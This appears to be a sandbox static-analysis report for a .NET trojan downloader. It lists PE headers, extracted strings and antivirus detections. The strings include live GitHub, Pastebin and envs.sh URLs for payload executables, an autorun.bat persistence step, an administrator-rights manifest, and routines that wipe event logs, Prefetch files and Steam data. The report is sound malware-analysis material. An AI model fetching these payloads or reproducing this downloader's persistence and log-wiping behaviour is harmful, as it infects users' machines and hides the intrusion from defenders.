Static | ZeroBOX

PE Compile Time

2073-10-20 09:45:59

PDB Path

C:\Users\Egor\source\repos\WindowsFormsApp14\WindowsFormsApp14\obj\Debug\WindowsFormsApp14.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00005160 0x00005200 5.53752931253
.rsrc 0x00008000 0x00000578 0x00000600 3.80025774157
.reloc 0x0000a000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00008090 0x0000035c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000083fc 0x00000177 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<DownloadFile>d__10
<>c__DisplayClass15_0
<>9__5_0
<Main>b__5_0
<DownloadAndOpenFile>b__0
<WaitForKeyPress>d__11
<pastebinUrl>5__1
<newVersionUrl>5__1
<processes>5__1
<client>5__1
<>8__1
<>u__1
Func`1
IEnumerable`1
Task`1
AsyncTaskMethodBuilder`1
TaskAwaiter`1
version1
<fileName>5__2
<tempPath>5__2
<latestVersion>5__2
<ex>5__2
<>s__2
<>u__2
Func`2
version2
<client>5__3
<ex>5__3
<>s__3
<ExecuteDownloadAndOpenFiles>d__14
WindowsFormsApp14
<ex>5__4
<DownloadAndOpenFile>d__15
<Main>d__5
<WaitForProcessToExit>d__16
<CheckForUpdates>d__6
<DownloadStringFromUrl>d__7
<DownloadAndUpdate>d__9
<Module>
<Main>
System.IO
VK_SHIFT
mscorlib
System.Collections.Generic
DownloadFileTaskAsync
DownloadStringTaskAsync
IsKeyPressed
AwaitUnsafeOnCompleted
get_IsCompleted
Synchronized
NetworkInterface
defaultInstance
set_AutoScaleMode
get_Message
GetIsNetworkAvailable
Enumerable
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
DownloadFile
DownloadAndOpenFile
Console
GetFileName
processName
GetProcessesByName
ReadLine
WriteLine
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
System.Core
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
DownloadAndUpdate
Create
EditorBrowsableState
GetAsyncKeyState
<>1__state
Delete
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
WindowsFormsApp14.exe
set_ClientSize
IsProcessRunning
System.Runtime.Versioning
String
disposing
System.Drawing
EventLog
filePath
LoadSteamPath
steamPath
GetTempPath
GetFolderPath
StartsWith
get_Task
System.ComponentModel
user32.dll
ContainerControl
DownloadStringFromUrl
Program
System
resourceMan
GetFileNameWithoutExtension
currentVersion
get_Location
System.Net.NetworkInformation
System.Configuration
System.Globalization
Action
System.Reflection
SetException
StringComparison
CultureInfo
System.Linq
FileDownloader
AsyncTaskMethodBuilder
<>t__builder
SpecialFolder
get_ResourceManager
System.CodeDom.Compiler
IContainer
TaskAwaiter
GetAwaiter
StreamWriter
TextWriter
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
WindowsFormsApp14.Properties.Resources.resources
DebuggingModes
GetDirectories
WindowsFormsApp14.Properties
CleanPrefetchFiles
CleanFiles
ExecuteDownloadAndOpenFiles
GetFiles
CheckForUpdates
prefixes
Settings
CleanEventViewerLogs
System.Threading.Tasks
System.Windows.Forms
CompareVersions
CleanSteamFolders
Process
process
WaitForKeyPress
components
Exists
CreateStartupBat
Concat
Object
Select
System.Net
WaitForProcessToExit
WaitForExit
waitForExit
get_Default
GetResult
SetResult
WebClient
Environment
InitializeComponent
MoveNext
set_Text
ReadAllText
WriteAllText
ToArray
get_Assembly
GetExecutingAssembly
CleanDirectory
WrapNonExceptionThrows
WindowsFormsApp14
Copyright
2025
$6b78e869-bd16-4849-8c07-17b450ef7219
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2&
!FileDownloader.Program+<Main>d__5
,FileDownloader.Program+<CheckForUpdates>d__6
2FileDownloader.Program+<DownloadStringFromUrl>d__7
.FileDownloader.Program+<DownloadAndUpdate>d__9
*FileDownloader.Program+<DownloadFile>d__10
-FileDownloader.Program+<WaitForKeyPress>d__11
9FileDownloader.Program+<ExecuteDownloadAndOpenFiles>d__14
1FileDownloader.Program+<DownloadAndOpenFile>d__15
2FileDownloader.Program+<WaitForProcessToExit>d__16
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\Egor\source\repos\WindowsFormsApp14\WindowsFormsApp14\obj\Debug\WindowsFormsApp14.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
5F5U;pE
C:\Windows\Temp
C:\Users\Egor\AppData\Local\Temp
C:\Users\Egor\AppData\Local\CrashDumps
fO2.exe
WINDOWSFORMSAPP
NOTEPAD
chrome
Notepad
CONHOST
DLLHOST
Loader
Software
ALKAD LOADER
extreme
EXLOADER
.EXE-BAB9F68F.pf
putisha
PUTISHA
putisha.exe
dG.exe
C:\ProgramData\Microsoft\Windows\WER\ReportArchive
C:\ProgramData\SoftwareDistribution\fO2.exe
C:\ProgramData\SoftwareDistribution\dG.exe
Application
Event Viewer:
Prefetch
Prefetch
C:\ProgramData\SteamPath.txt
Steam:
config
userdata
autorun.bat
@echo off
start "" "
WindowsFormsApp14.Properties.Resources
https://pastebin.com/raw/4LkF0iPK
Current version:
Latest version on Pastebin:
New version found. Updating...
Version is up to date.
Update check error:
C:\ProgramData\SoftwareDistribution
https://github.com/kfocc557/kfocc/raw/refs/heads/main/WindowsFormsApp14.exe
version.exe
Failed to download new version.
New version launched.
Update download error:
Downloaded file:
File download error
https://github.com/kfocc557/kfocc/raw/refs/heads/main/CHROM.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/CONHOST.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/vmss.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/jopa.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/skeet.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/putisha.exe
https://envs.sh/dG.exe
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
WindowsFormsApp14
FileVersion
1.0.0.0
InternalName
WindowsFormsApp14.exe
LegalCopyright
Copyright
2025
LegalTrademarks
OriginalFilename
WindowsFormsApp14.exe
ProductName
WindowsFormsApp14
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
Sangfor Clean
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong TrojanDownloader/MSIL.Pstinb.a
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Clean
tehtris Clean
ESET-NOD32 Clean
APEX Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!7351F6D3D1F7
Trapmine Clean
CTX Clean
Emsisoft Clean
Ikarus Clean
FireEye Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet PossibleThreat
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Msil.TrojDownloader.pstinb.a
Gridinsoft Trojan.Win32.Gen.dd!n
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!27C15CCCF3C4
TACHYON Clean
VBA32 Downloader.MSIL.Pabin.Heur
Malwarebytes Trojan.Downloader.MSIL.Generic
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Downloader.Pstinb!8.A68 (CLOUD)
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Clean
GData Clean
AVG Clean
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.